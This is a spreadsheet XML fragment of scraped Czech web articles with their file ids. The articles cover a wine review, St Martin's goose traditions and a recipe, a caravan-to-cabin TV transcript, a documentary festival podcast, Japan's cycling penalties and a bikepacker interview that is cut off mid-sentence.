    <t>Víno André REZERVA 2021, moravské zemské víno , Vinařství Josef Licek /100 25. 2. 2024 „Tmavě višňově červená barva s tenkým cihlovým meniskem, rubínovými odlesky a vysokou viskozitou. Velmi výrazná, bohatá, čistá, intenzivnější, mohutná vůně s převažující tóninou koření z barrique sudu na višňovém podkladu. Neskutečně krásné. Delikátní kouřové aroma se pojí s tóny višní v čokoládě, vanilky a skořice. Prostě nádhera! Bohatá, harmonická, velmi extraktivní ovocná chuť, přináší vše co slibovala vůně a přidává vyzrálé, hebké, sametové tříslo, s velmi jemnou višňovou kyselinkou. Velmi dlouhý, višňově čokoládový závěr. Velmi nádherné a krásně pitelné víno . Kdo neochutnal, neuvěří - jeho škoda. Víno jsem vybral a otevřel v den svých narozenin a nemohl jsem mít šťastnější volbu.“ /100 21. 9. 2024 „Vůně výrazně kořenitá (silně po hřebíčku) a barikovém sudu. Vinařovo přirovnání s vůní po vyhaslém krbu je taky trefná. Z ovoce jsou zde, pro pinot tolik typické, jahody a lehce maliny. V chuti je víno hodně různorodé a samotné působí hodně kořenitým, až hořkočokoládovým dojmem se spáleninou. Za mě je zde hodně barikového sudu, který už možná i v souhře s alkoholem působí hořčejším dojmem. Celkově je to pěkný a náročnější pinot na vyšší kyselině. Mimochodem tuto viniční trať mám na pinoty moc rád. 86-87b.“ /100 20. 9. 2024 „Aktuálně je víno plné malin, švestek, višní, ostružin. Poté čokolády s vanilkou. Je to takový mix, koktejl. Jak ve vůni, tak i v chuti. Doprovázené vyšší kořenitě dřevitou dochutí s ovocnou kyselinou. Krásně letní pití, velice příjemné a půvabně pitelné. Naturálka jak vyšitá:) Za tyto peníze rozhodně doporučuji.“ Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>1970</t>
  </si>
  <si>
    <t>20241101_126_3244679227_571b389731a586027a08.html</t>
  </si>
  <si>
    <t>571b389731a586027a08</t>
  </si>
  <si>
    <t>SvatomartinskĂ© prohlĂ­dky v pivovaru VelkĂ© Popovice</t>
  </si>
  <si>
    <t>SvatomartinskĂ© prohlĂ­dky v pivovaru VelkĂ © Popovice 1. listopad 2024 České nápoje komentáře (0) 252 x Zda a kam letos přijede svatý Martin na bílém koni, zatím není jisté, ale v pivovaru Velké Popovice nedaleko Prahy v listopadu zaručeně bude bílý kozel! O víkendu 9. a 10. 11. vždy v 11 a ve 13 hodin se tam uskuteční speciální Svatomartinské prohlídky se školou čepování, rozšířenou ochutnávkou piva a drobným občerstvením. Svatomartinské prohlídky v pivovaru Velké Popovice „ Návštěvníci se dozvědí mnoho zajímavého o bohaté historii pivovaru, seznámí se s výrobou piva a surovinami, které se pro velkopopovické pivo používají, uvidí historickou i současnou varnu, stáčírnu lahví a sudů, expozici pivních obalů a pod dohledem mistra výčepního si sami zkusí načepovat pivo . K zakousnutí určitě přijde vhod tradiční svatomartinská delikatesa – husí paštika. Závěr prohlídky pak bude patřit setkání s maskotem našeho pivovaru – bílým kozlem Oldou,“ říká Václav Šimek , manažer Velkopopovického pivovaru. Otevřen samozřejmě bude Kozlí obchůdek na nádvoří pivovaru se spoustou tipů na vánoční dárky přímo od Kozla . Více informací a online prodej vstupenek: https://tickets.prazdroj.cz/svatomartinske-prohlidky-se-skolou-cepovani Zdroj: Tisková zpráva Autor: Autor: | České nápoje || České nápoje</t>
  </si>
  <si>
    <t>248</t>
  </si>
  <si>
    <t>101</t>
  </si>
  <si>
    <t>20241101_127_3250230879_31c277f7e5dcc6670168.html</t>
  </si>
  <si>
    <t>31c277f7e5dcc6670168</t>
  </si>
  <si>
    <t>Ze staré maringotky je pěkná chata na kolech! A s originální vychytávkou</t>
  </si>
  <si>
    <t>Ze staré maringotky je pěkná chata na kolech! A s originální vychytávkou My Češi, jsme národem chatařů a chalupářů. Z našich víkendových útočišť se ale postupem času stala spíš neútulná a nesourodá odkladiště všeho nepotřebného. A místa určená k odpočinku tak ztratila na svém původním významu. A proto jsme tu my, partička tří kamarádů, kteří jezdí po naší kouzelné zemi, aby vám z vašich chat udělala české chat. Ne, ten příběh je až neuvěřitelnej. No, tak já mám maringotky rád, takže už mám dvě a tohle to je třetí, kterou jsem našel v Krkonoších . Prej po nějakým principálovi z cirkusu, tak doufám a bylo docela těžký ji sem dostat. No, to věříme, to je pořádný kus cesty, to se projela. Ta velikost je za mě parádní. Tohle je v asijských státech pomalu standard pro velkou, možná i dvougenerační rodinu. To je nádhera. Je něco, co byste si přál zachovat? No, tak ideálně, aby to zvenku zachovalo ten ráz tý první republiky. A to prosvětlení se mi líbí. To se prosvětlení je hezké. No, samozřejmě to má kouzlo. Pan má rád maringotky, takže se budeme snažit mu to nezkazit ten dojem z toho. Zachováme ten tvar. Jo, pěkně oblouky, všechno bude tak, jak je, možná to trošku přizvedneme nahoru a jednu podélnou hranu využijeme pro kuchyňskou linku a rozkládací skříně, ta bude vlastně ta funkční a druhou stranu využijeme pro maximální otevření fasády, tady uděláme velké okno, tady bude mít posezení, jeden vchod a tady uděláme takové pěkné horizontální okno podélné, které mu bude osvětlovat tu pracovní plochu s dřezem, s nějakou dvojplotýnkou a tady uděláme obytnou skříň s rozkládací postelí, ať je to možné využívat jako ložnicovou část a tady bude pěkně vyřezaná dělící stěna s nějakým otvorem, ať se to může procházet, dveře necháme, za nima je kozlík s vojí, tak je to pěkně využitelné. Ondro, já už chci tu terásku. Kdy bude?Já mám nápad. Když terasu, tak dívej. To nebude moct vedle? (???) Že bysme ji vyrobili z 10 sekyrek?Jak padací most. Jako Vavaria, sklápěčka ta. Mně by se líbilo, že bys to měla takovou jako obří okenici, kterou sklopíš, na ni vyjdeš, dáš si kávičku. Ten kluk čerpal múzu po cestě. A pak když jdu zpátky do těch dveří, tak buď zmáčkneš tlačítko, ono udělá. Pomaleji, byl jsi příliš dlouho na běžkách. Půjdu. Fakt dobrý. Jsem měl čas rozjímat. Jdeme to odstrojit teda? Tak jsem to vypadá.Tak do tance, mládeži. A půjde všechno. Se s tím moc pářete, hoši. Konečně si ji prosekal. Takhle velký okno si myslel, Ondro. Jo. Počkej. Proč já to řežu uvnitř. Ještě že jsme si to tak dobře nařezali. Že vám to jde, jako byste to už někdy dělali. Takže můžeme klidně spát na podlaze. Já nevím, jak vy, ale mě dneska byla docela zima. Vysaďte to kluci. Vy ručíte za to, že to bude přesně. Já tam nevidím. To drží. Šup. Jdeme tam nebo sem?Tam. Cela nám přichytne pojistnou hydroizolaci, tu si tam dejte vždycky, ať vám neteče do vaty, pak to navlhne ta vata, neizoluje, plesnivý, degraduje, neposlouchejte žádné takové nějaké strejdy z vedlejší vesnice, že? A co říkají strejci z vedlejší vesnice. To jsme nikdy nedávali. Tzn. z téhle strany zamezuje, aby voda šla dovnitř, z druhé strany páry, které jsou vevnitř, z lidí, prostě z kuřat, co se tam pečou, tak zase jdou ven, to je důležité, protože jinak ty páry zůstávají vevnitř v té minerální vlně a zase plesniví a zejména co? Degradují. Protože Ondra to nikdy nevymýšlí jednoduchý, tak jsme tu maringotku zvedli tak, aby tam opravdu jako vzniknul prostor, který by byl důstojný pro rekreaci, tím se nám vlastně ten objem a i ta pevnost zmenšila, tak jsme museli vymyslet způsob žeber, kterýma ztužíme ty stěny tak, abysme je provázali mezi sebou a začalo to spolu působit jako jeden celej díl. A díky tomu by to mělo přežít i transporty. Nejenom, že to bude stát, když to bude na jednom místě. Sebíku, pěkný odstín podlahy, líbí se ti? Jo, jde dobře k fasádě? Mně přijde, že se to tak jako tím, jak to tu máme, ten odstín, že se tak hezky usadilo, víš, že se to opticky prodlužuje a zároveň, že to jako tak pevně pojí s tou maringotku. S Ondrou jsme měli diskuzi, jestli opalovaná anebo z termo dřeva. Fasádu jsme nakonec zvolili z termo dřeva, protože to je míň práce, zjistili jsme, že to opalování není tak jednoduchý, aby to dopadlo dobře a mělo to stejný efekt, to termo dřevo se peče při určité teplotě a při té teplotě se z toho vlastně vypečou všechny ty živé složky, nezůstane tam ani žádná voda, to znamená, máme ho perfektně vysušený, a to dřevo, když ho dáte takhle na fasádu, do venkovního prostředí, tak ono trošičku ještě zešedne, ale už ho nemusíte nějak ošetřovat. Ten proces toho stárnutí toho dřeva je velmi pomalý, to dřevo v sobě fakt už nemá nic, co by degradovalo. Je to jenom čistě zpečený to dřevo a zároveň to zpečení tomu dodá tuhle tu barvu. My tady máme termo borovici a vidíte, že vlastně tohle není určitě přirozená barva borovice a došlo k tomu jenom tím pečením, to znamená, když to kdekoliv poškodím, tak je to probavený na celou hloubku toho dřeva, takže se nemusíte bát, když máte něco namalované, nalakované a pak to poškodíte, tak je tam hrozně vidět poškození. Tady ne, tady prostě, opravdu je to v celé hloubce. Dobré.Jdeme na to?Dáš ty ruce pryč. Neskřípni si tam prstíky. No, zvedejte. Bacha na prstíky. Jakoby může si to majitel dělat sám. A klíče zahoď teď.Sněs. Dobré, ne? Drží. Dobrý, pouští nohu. Ježíš, to fakt pro jednoho. Držíš to? Ne.Já to musím pustit teď. Tak to pusť. Srovnej nožičky. Je to pecka.U maringotky člověk nikdy neví, jestli bude u zdroje elektřiny. Takže vždycky si vzít 1-2 panely s sebou na cesty, jenom to tady opřeme, jo, když slunko se otočí, tak to přemístíme jinam a můžeme naplnit přes den pěkně úložiště, co máme schované vevnitř, takže si můžou svítit a vařit a i večer. Dobrý den.Dobrý den. Dobrý den. No, ty brďo.Tak tady to je. Bomba, ty jo. My tady tu pro vás něco máme, že. Fasáda je z termo dřeva, to znamená, nemusí se ani ošetřovat. Máte tady terásku.To vidím, no. Když potom je třeba odjet, tak se dá zvednout a zabezpečí vzadu ty dveře. Nohy, nohy se skoupěj nebo se nemusí? Dají se sklopit.Super.Pak tady zámky, jo, kdo má klíče.Aha a kdo má klíče? Kdo má klíče?Už vy. Tolik?Úplně od všeho. Jsme udělali hodně dveří. Super, tak to jsem zvědavej, no, čekal jsem takový jakoby nějaký retro kousek a tohle úplně bomba, ty jo. Víte, co to je, tak maringotky jsou barevné, že, ale je třeba trochu aktualizovat. Pojď honem, ty jo, ta je šikovná. Nemám se zout?Ne, to pojďte. Ta podlaha je odolná dostatečná. Velkorysá kuchyň teda. Tak je to to jediné, co tady je, že. Já doufám, že ne.On je to takovej vlastně jako food truck.V tuhle chvíli. To zrovna jsem si říkal, že bych mohl jezdit. Budeme objíždět Šumavou . Tak.Tak jako sezóna se blíží. Nabízet papů. Úplně ideální. Soláry tady napájí šťávou to základní vybavení, co tady je, to znamená světla, zásuvky, lednička. O, krásný. Na pivo . Na ty pivínka, aby to bylo čím zapíjet. Tady se bude hodně vařit. Dřez s přípravou napojení. To samé platí pro sporák. Tam stačí asi dát bombu, že jo, jenom. Si zásobuje plynem i to topný tělísko. A bomba se dává kam? A bomba je vlastně vyvedená venku, to znamená pod maringotku nebo se tam dá přichytit zespoda na podvozek. Dobře. Super.Nevejdeme se tam všichni, ale Ondra to předvede názorně. Já vám to předvedu názorně. Se tady uvězním. Udělali jsme tady totiž.. Podej nám matrace, ať to nemusíš to. Matrace, ta je využitelná a i venku, jo. Ano, tady je speciální vrstva tomu, že to někam položit, je omyvatelná, jo, jo, takže si to můžete třeba dát na louku, kdybyste chtěl.Aha, super. Ale základní využití máme tady z automobilového průmyslu. A sice rozkládací postel. Nepřestávám zírat.Tak a teď můžete dát zpátky tu matrac rozkládatelná. Ano.Máme to z české manufaktury. Oni vyrábějí matrace do obytných aut, ale nám vyrobili do maringotky. Super, super, super.Krásný. Můžete to vyzkoušet klidně. Robine, vyzkoušíme to? No, nádhera, ne, super, je to i pevný, parádní. Je to bytelný? Jo, je to super, neuvěřitelný. Co je tady? Tady je úložný prostor.Ano. Lavice na věci, políčka, nic složitého. Minimalismus.Minimalismus. A tady pozor, specialita, přijdete, zavřete dveře a je jasné, že to je jenom pro vás, že. Že je obsazeno.Jdete ven, sundáte. Výborně.Je to zaizolovaný, takže tady relativně drží teplo, ta tloušťka je limitovaná na tu tloušťku tý konstrukce, i v zimě se dá relaxovat. To doufám, no.Nám zbývá otázka, jestli jste spokojený s přestavbou? Jsem, nadmíru, ani nedosáhnu na strop. Tak super. Neuvěřitelný. To, aby ty včelky tady mohly volně poletovat a moc vás to nerušilo. Z úlů už pomalu vylétají, takže sezóna začíná. A maringotka s nádherným výhledem může fungovat. Ano.Tento pořad sledujte již nyní na Prima Plus. Šestý díl pořadu České chaty snů nás zavedl do jižních Čech . Naše architekty ve složení Petr Portych, Ondřej Zdvomka a sochař Sebastian Wojnar čekala originální výzva – proměnit starou cirkusovou maringotku v moderní mobilní chatu na kolech. A povedlo se! Pořad: České chaty snů</t>
  </si>
  <si>
    <t>20241101_128_3244652257_e276e8efbeedcbf77fad.html</t>
  </si>
  <si>
    <t>e276e8efbeedcbf77fad</t>
  </si>
  <si>
    <t>Svatomartinské hody se blíží: Znáte základní triky na přípravu té nejlepší husy?</t>
  </si>
  <si>
    <t>Svatomartinské hody se blíží: Znáte základní triky na přípravu té nejlepší husy? Svatomartinské hody, které se konají každoročně 11. listopadu, jsou oslavou dobrého jídla, pití a tradic. Tento den je nejen příležitostí užít si pečenou husu a mladé víno , ale také připomínkou legendy o svatém Martinovi . Zkuste si připravit křehkou a šťavnatou husu podle našeho receptu. A nezapomeňte ji doplnit sklenkou lahodného svatomartinského vína , které k těmto hodům neodmyslitelně patří. Chcete se dozvědět více o původu těchto tradic? Objevte, jak vznikly svatomartinské oslavy a jaké příběhy se za nimi skrývají. Co v článku najdete Kde se vzala svatomartinská tradice? Tučná husa, tuhá zima Tajemství perfektní pečínky Pomalu pečená husa s dýňovými noky – recept Je libo svatomartinské víno ? Kde se vzala svatomartinská tradice? Důvod, proč 11. 11. končí husy na pekáči , můžeme najít v legendě o svatém Martinovi . Ten byl původně vojákem, ale poté, co se mu ve snu zjevil Ježíš, se obrátil k víře a stal se knězem. Založil klášter nedaleko Tours ve Francii a brzy kolem sebe shromáždil následovníky, kteří jej zvolili biskupem. Před svou delegací se sv. Martin schoval do jedné z pousteven. Jeho úkryt však brzy vyzradilo husí kejhání , a proto se husa stala symbolem sv. Martina a atributem celého svátku. Dle další legendy končívá husa v den svatého Martina na pekáči za trest, protože svým kejháním rušila bohoslužbu. Vysvětlení ovšem může být i prozaičtější. V hospodářstvích se většinou husy zabíjely právě na podzim , kdy se zároveň konaly nejrůznější poutě a trhy, na nichž se husy opékaly. Tučná husa, tuhá zima Husy ale neznamenaly pouze vydatnou hostinu, sloužily také k předpovídání toho, jaká bude následující zima . Ženy podle míry podkožního tuku z husy a jejích kostí předpovídaly, jak kruté mrazy udeří. Čím tučnější husa byla, tím tužší zima měla přijít. Obdobně pokud měla spíše tmavé kosti, očekávaly se Vánoce na blátě, byly-li kosti bílé, měla naopak napadnout spousta sněhu. food.kiro / Shutterstock.com Tajemství perfektní pečínky Ptáte se, jak na voňavou, křehkou husu, jejíž maso není vysušené, ale naopak krásně šťavnaté? Kouzlo je v dlouhém a pomalém pečení při nízké teplotě, které může trvat klidně 12 hodin . Vysušení můžete předejít také ponořením masa do sádla. Tento způsob úpravy zvaný konfitování totiž zaručí, že maso bude perfektně upečené, ale stále šťavnaté . Zárukou podařené pečínky je také původ masa. Pro takovou husu už naštěstí nemusíte na farmu, kvalitní drůbež seženete i v supermarketu . Jakmile ji koupíte, nezapomeňte ji den předem nasolit, případně okmínovat, a nechte odpočívat. Nikdy ji nedávejte do trouby přímo z lednice, maso by mohlo zažít teplotní šok. Před pečením ji nechte dvě hodiny v pokojové teplotě. Pečení poté natáhněte na co nejdelší dobu a upečenou husu podávejte buď s knedlíkem a zelím, nebo si k ní připravte bramborové lokše . UrbanRadim / Shutterstock.com Pomalu pečená husa s dýňovými noky – recept Na husu budete potřebovat: 1 celou husu 1 cibuli 1 větší jablko 1 pomeranč kmín celý sůl Na noky budete potřebovat: 250 g vařených brambor (nejlépe moučných) 250 g vařené dýně Hokkaidó 1 vejce „M“ 250 g hrubé mouky 2 lahůdkové cibulky (zelená část) Cibuli, jablka a pomeranče nakrájejte na kousky , přidejte kmín a sůl, smíchejte a husu naplňte. Kůži osolte a okmínujte a husu podlijte vodou. Pečte na 220 °C po dobu 30 minut, poté teplotu snižte na 80 °C a pomalu pečte asi 8 hodin . Na dýňové noky uvařte brambory a dýni ve slupce do měkka, oloupejte a propasírujte přes lis na brambory. Přidejte vejce, mouku, sůl a smíchejte. Z těsta tvarujte noky nebo malé knedlíčky, které vařte ve vroucí vodě po dobu několika minut. Jakmile vyplavou, poznáte, že jsou hotové. Atsushi Hirao / Shutterstock.com Je libo svatomartinské víno ? S tradicí svatomartinských hodů jsou spjata též svatomartinská vína , jejichž první ochutnávka by měla připadnout na 11. 11. v 11 hodin . Před tímto časem je ani ve většině obchodů nekoupíte. Jedná se o první vína ročníku, o čemž vypovídá i jejich jiskrná barva, ovocná vůně a lehká svěží chuť. Tato vína také mívají nižší obsah alkoholu , průměrně okolo 12 %. Pití svatomartinského vína je spojeno již s dobou císaře Josefa II . , na jehož dvoře končila začátkem listopadu čeledínům a děvečkám služba. Uzavření smlouvy na další rok pak bylo stvrzeno stiskem ruky a připitím mladým vínem . Pod značkou „Svatomartinské“, kterou musí užívat všichni vinaři bez výjimky, lze prodávat pouze vína vybraných odrůd , například Veltlínské červené, Muškát moravský, Modrý Portugal či Zweigeltrebe. Zdroje: Kupi, Deník.cz Diskuze Diskutovat recept svátek víno podzim husa svatomartinská husa svatomartinské víno svatý Martin tradice</t>
  </si>
  <si>
    <t>336200</t>
  </si>
  <si>
    <t>270580</t>
  </si>
  <si>
    <t>20241101_129_3244710100_b6a44f5c0a8db28f74af.html</t>
  </si>
  <si>
    <t>b6a44f5c0a8db28f74af</t>
  </si>
  <si>
    <t>Živě z Ji.hlavy. Je větší monstrum wrestlingový promotér, nebo ruský otužilec, co žere Kim Čong-una?</t>
  </si>
  <si>
    <t>Živě z Ji.hlavy. Je větší monstrum wrestlingový promotér, nebo ruský otužilec, co žere Kim Čong-una? Dlouholetí vyznavači názoru, že dokument není film, Aleš a Vítek konečně dorazili na festival zasvěcený právě této disciplíně. Tomák coby rodák z Vysočiny a pravidelný návštěvník Mezinárodního festivalu dokumentárních filmů Ji.hlava se snažil tento formát zuby nehty hájit. Byl nakonec donucen kapitulovat a přitakat zde pronesené větě španělského tvůrce Alberta Serry , že dokumenty jsou impotentní? Aby náležitě demonstrovali, jak to mají s dokumentárním žánrem, rozhodli se Čelisti svůj první vstup během živého vysílání z Ji.hlavy věnovat dokumentární sérii z platformy Netflix. Šestidílný Mr. McMahon o promotérovi, který proměnil wrestling na mainstreamovou zábavu i obludnou metaforu pozdního amerického kapitalismu, je fascinujícím portrétem člověka, který se stal větším monstrem než všichni jeho zápasníci. Aleš ocenil chytrou dramaturgii stírající rozdíl mezi pravdou a fikcí i fakt, že je někdo větší nelida než on. Vítek zavzpomínal na to, kdy zjistil, že rány ve wrestlingu nejsou opravdové, ale bolest je skutečná. A Tomák se zasnil nad osudem obra Andrého The Gianta, který vedle masakru soupeřů vynikal schopností vypít 119 piv během šesti hodin. Nejspíš se jedná o stejně pravdivou historku jako vše, co se pojí s touto teatrální zábavou, jejímž fanouškem je Donald Trump a jejíž rysy přerostly do současné politiky. Mr. McMahon | Official Trailer | Netflix Upravit Smazat Video of Mr. McMahon | Official Trailer | Netflix Poté už přišly na řadu dva portréty z Ji.hlavy. Jeden věnovaný dalšímu monstru, druhý jeho pravému opaku. Filip Remunda ve snímku Štěstí a dobro všem vykreslil novosibiřského jaderného fyzika, otužilce a milovníka severokorejské politiky Vitalije coby figuru tak mnohoznačnou, že jeho snímek sice poskytuje vhled do rysů ruské jurodivosti i nacionalismu, ale občas lavíruje na hraně etiky. I Marek Šulík měl štěstí na protagonistku. Intimní portrét Zuzany Čaputové Prezidentka je smutným obrazem světa, kde lidskost nemá šanci se prosadit. A lidstva se záhy zřekli i Aleš, Vítek a Tomák, kterým se zdaleka nejvíce líbil dokument o lišejnících. Pak už bylo na čase vyklidit scénu, protože Aleš s Vítkem chytli akutní otravu dokumentem a Tomákovi se vlivem lokálního vzduchu rozjely atavismy z mládí. Proč je Tsai Ming-liang největším žijícím filmařem? Kolikrát natankoval Tomák zadarmo na benzínce na Vysočině? A jak je možné, že vyhrál Zlatou palmu v Cannes artový mix Pretty Woman s Pařbou ve Vegas ? autoři: Aleš Stuchlý , Vít Schmarc , Tomáš Stejskal Sdílet Facebook Twitter LinkedIn Spustit audio Všechny díly pořadu na mujRozhlas Autor: Tomáš Stejskal, Vít Schmarc, Aleš Stuchlý Autoři person Tomáš Stejskal Vít Schmarc Aleš Stuchlý Rubrika transition_slide Film</t>
  </si>
  <si>
    <t>10090</t>
  </si>
  <si>
    <t>13870</t>
  </si>
  <si>
    <t>20241101_13_3264762929_fc36b88fd01e3362522c.html</t>
  </si>
  <si>
    <t>fc36b88fd01e3362522c</t>
  </si>
  <si>
    <t>Rok vězení za telefon v ruce během jízdy na kole. Nový zákon v Japonsku zpřísňuje tresty pro cyklisty</t>
  </si>
  <si>
    <t>Rok vězení za telefon v ruce během jízdy na kole. Nový zákon v Japonsku zpřísňuje tresty pro cyklisty V Japonsku v pátek vešel v platnost zákon ukládající vězení a pokuty cyklistům, kteří používají při jízdě mobilní telefon nebo jsou pod vlivem alkoholu . Nejvyšší pokuta činí v přepočtu 152 000 korun, maximální délka odnětí svobody pět let, píše agentura Kjódó. Tokio 21:50 1. listopadu 2024 Pokud cyklisté s telefonem v ruce způsobí nehodu, mohou jít do vězení až na jeden rok | Foto: Stanislav Kogiku / SOPA Images/Sipa USA | Zdroj: Reuters Lidem, které policie přistihne při používání mobilního telefonu při jízdě na kole, ode dneška hrozí vězení až na šest měsíců nebo pokuta až 100 000 jenů (přes 15 000 korun). Pokud cyklisté s telefonem v ruce způsobí nehodu, mohou jít do vězení až na jeden rok nebo budou muset zaplatit až 300 000 jenů (necelých 46 000 korun). Dosud byla maximální výše pokuty 50 000 jenů (více než 7600 korun). Cyklisté patří k nejméně ukázněné skupině účastníků silničního provozu. U nehod často hraje roli alkohol Číst článek Zákon přísněji postihuje také jízdu na kole pod vlivem alkoholu . Pokud policie naměří cyklistům více než 0,15 miligramu alkoholu v dechu, hrozí jim až tříletý trest vězení nebo pokuta až půl milionu jenů (přes 76 000 korun). Vážnější trestné činy zaviněné cyklistou s alkoholem v krvi mu mohou vynést až pět let vězení nebo finanční postih ve výši jeden milion jenů (přes 152 000 korun). Krátce poté, co zákon začal platit, oznámila policie v prefektuře Ósaka na jihu Japonska udělení první pokuty za jízdu pod vlivem alkoholu a vyšetřování dalších šesti případů. Podle Kjódó se stalo mezi lety 2013 až 2017 celkem 295 nehod, které způsobili cyklisté používající telefon. V letech 2018 až 2022 narostl počet nehod o 53,9 procenta na 454. V České republice jsou postihy výrazně mírnější. Pokud cyklista použije za jízdy mobilní telefon, hrozí mu pokuta až 10 000 korun. Pokud nadýchá do jedné promile, hrozí mu pokuta do 25 000 korun, nad jednu promile pak až 50 000 korun. ČTK</t>
  </si>
  <si>
    <t>751</t>
  </si>
  <si>
    <t>20241101_130_3244627316_8240b7ddaee79570332e.html</t>
  </si>
  <si>
    <t>8240b7ddaee79570332e</t>
  </si>
  <si>
    <t>Proč jíme husu na svatého Martina? Příběh a význam této tradice</t>
  </si>
  <si>
    <t>Proč jíme husu na svatého Martina ? Příběh a význam této tradice AkcniCeny.cz Magazín Proč jíme husu na svatého Martina ? Příběh a význam této tradice (Foto: canva.com) #Ostatní #Svátek #Svatomartinská husa #Svatomartinská vína #Tradice Každoročně 11. listopadu slavíme svátek svatého Martina , což je příležitost, kdy se na stolech po celé České republice objevuje svatomartinská husa. Proč právě husa a jaký je význam této tradice? V tomto článku si přiblížíme příběh svatého Martina , jeho symboliku a vznik jedné z nejoblíbenějších listopadových tradic. Co se v článku dozvíte? Kdo byl svatý Martin a proč se s jeho svátkem pojí husa? Jak svatomartinská hostina vznikla a co symbolizuje? Proč se k husí pečínce váže rčení o Martinovi na bílém koni? Kdo byl svatý Martin a proč slavíme jeho svátek? Svatý Martin, původem z římské provincie Panonie (dnešního Maďarska ), byl významným křesťanským světcem a vojákem, který žil ve 4. století. Jeho život se stal inspirací pro mnoho lidí, a právě díky jeho činnosti a skutkům se jeho památka každoročně připomíná 11. listopadu. Martin byl známý svou štědrostí a oddaností křesťanským hodnotám – jedním z nejznámějších příběhů je příběh, kdy se rozdělil o svůj plášť s chudým mužem, aby ho uchránil před chladem. Tento čin ho proslavil a stal se symbolem soucitu a pomoci potřebným. Kromě toho, že je svatý Martin považován za ochránce vojáků, koní a jezdců, se stal také patronem vinařů a farmářů, což se promítá i do oslav jeho svátku. Ve střední Evropě , včetně České republiky , se jeho svátek dlouhá staletí slaví ve spojení s tradičním jídlem – pečenou husou. Proč právě husa na svatého Martina ? Jednou z nejoblíbenějších tradic spojených se svátkem svatého Martina je konzumace husy, což má své kořeny jak v legendách, tak v historických zvycích. Podle legendy byl sv. Martin natolik pokorný, že se nechtěl stát biskupem a schovával se v husím chlívku. Husy ho však svým hlasitým kejháním prozradily, a tak se Martin nevyhnul svému jmenování. Od té doby se traduje, že husy jsou symbolem tohoto svátku, a připomínají nám, že i ty největší plány mohou být nečekaně odhaleny. Další důvod, proč právě husa, je spojen s hospodářským cyklem. V období konce podzimu byly husy dostatečně vykrmené a připravené k zabití, takže se jejich maso stalo ideálním pro slavnostní hostiny. Svatomartinská husa se tak stala symbolem hojnosti a zároveň poslední velkou hostinou před adventním obdobím, které je spojeno s postem. Svatomartinská hostina a její symbolika Svatomartinská husa se obvykle podává s knedlíky a zelím, což je tradiční česká kombinace, která dobře ladí s výraznou chutí pečené husy. Husa na svatého Martina symbolizuje také cyklus sklizně a připravenost na zimu – je to doba, kdy lidé sklidili své úrody a připravili se na zimní měsíce. Svatomartinská hostina tak má pro Čechy zvláštní význam, který přesahuje jen chuťové požitky a propojuje rodiny u stolu, aby spolu oslavily ukončení období sklizně. K této tradici se váže i známé rčení, že „svatý Martin přijede na bílém koni“. Toto rčení symbolizuje, že příchod svatého Martina , tedy 11. listopad, přináší první sníh. Ačkoli to neplatí každý rok, tato pranostika dodává svátku svatého Martina kouzlo a očekávání příchodu zimy. Jak slavíme svátek svatého Martina dnes? V dnešní době se tradice spojená se svatým Martinem stále těší velké oblibě. Na svatomartinské hody zve mnoho restaurací i domácností, a kromě pečené husy se v tento den obvykle podává také svatomartinské víno , které je symbolem konce vinařské sezóny. Svatomartinská vína bývají mladá a svěží, a tak skvěle doplňují svatomartinskou husu na slavnostních tabulích. Kromě toho se pořádají svatomartinské slavnosti, kde lidé mohou ochutnat nejen víno a husí pečínku, ale také další místní speciality a tradiční pokrmy. Svatý Martin se tak stává obdobím, kdy lidé nejen vzpomínají na tradice a historii, ale také se setkávají a společně oslavují příchod zimního období. Svatomartinská husa 2024: Jak si ji připravit? Pokud se chystáte na svatomartinskou hostinu doma, existuje několik tipů, jak husu připravit, aby byla křupavá a chutná. Tradiční recept doporučuje pomalé pečení, které zajistí, že maso zůstane šťavnaté a kůže křupavá. Husu můžete připravit s kmínem, jablky nebo kořením podle vlastního výběru. K tomu podávejte klasickou přílohu – knedlíky a zelí – pro pravou českou svatomartinskou atmosféru. Svatomartinské hody jsou tak příležitostí, jak si připomenout naše kulturní dědictví, pochutnat si na tradičním jídle a symbolicky přivítat zimu. Svatomartinská husa má v české kultuře dlouhou tradici, která sahá až k legendám a zemědělským zvykům našich předků. Svátek svatého Martina , kdy očekáváme Martina na bílém koni, je příležitostí setkat se u stolu, poděkovat za úrodu a těšit se na zimní měsíce. Pečená husa a mladé svatomartinské víno se staly hlavními symboly tohoto dne, které v sobě nesou nejen příběh svatého Martina , ale také oslavu hojnosti a příchod nového ročního období.</t>
  </si>
  <si>
    <t>48160</t>
  </si>
  <si>
    <t>33690</t>
  </si>
  <si>
    <t>20241101_131_3244718287_69121b84ec53e6c30ea1.html</t>
  </si>
  <si>
    <t>69121b84ec53e6c30ea1</t>
  </si>
  <si>
    <t>Cykločundrování. Štěpán Stránský miluje bikepacking a vyráží s bicyklem na extrémně dlouhé trasy</t>
  </si>
  <si>
    <t>Cykločundrování. Štěpán Stránský miluje bikepacking a vyráží s bicyklem na extrémně dlouhé trasy Představíme vám supersportovce, cyklistu Štěpána Stránského, ultra bikepackera. Na svém kontě má pěknou sbírku pódiových umístění z mnoha evropských závodů. A teď aktuálně si z Francie přivezl vítězství z extrémního závodu, jehož trasa vedla od Středozemního moře až k Ženevskému jezeru, Alps Divide 2024 v bikepackingu. Co to je vlastně za závod, v němž jste nedávno vyhrál? Jedná se o bikepackingové závody, do češtiny by se to dalo volně přeložit jako cykločundrování. A je to o tom, že se postavíte na start nějaké extrémně dlouhé trasy, vše co potřebujete, si musíte vézt s sebou na kole. Trasu překonáváte podle předem stanoveného itineráře. Nesmíte se odchýlit ani vám nesmí nikdo cizí pomáhat. Existují samozřejmě určité výjimky, že si třeba můžete nakoupit potraviny. Nebo si můžete z trasy odskočit přespat do hotelu, ale pak se zase na ni musíte vrátit. Ale po hotelech se spí velmi málo. To se ale bavíme o těch účastnících závodu, kteří jej absolvují v takovém závodním módu. Pak je více než polovina těch, kteří ho jede spíše v turistickém módu. Jako metu, chtějí dokázat prostě závod dojet. Štěpán Stránský ve studiu Českého rozhlasu Hradec Králové | foto: Milan Baják , Český rozhlas Takže bikepacking můžeme definovat tak, že si prostě sbalíte potřebné věci na kolo a vyrazíte na několikadenní výlet. Přesně tak, jen dodám, že se prostě při určitých akcích v tom závodí. Já v této disciplíně jezdím už 14 let, ale na kole jezdím odmalička, od svých šesti či sedmi let. To mne táta vzal poprvé na cyklovýlet s přespáním v přírodě přes noc. Vždy se mi zdá nejtěžší poslední absolvovaný závod. Tento sport je hodně o tom, kam jste schopen posouvat své limity a hranice. Štěpán Stránský, ultra 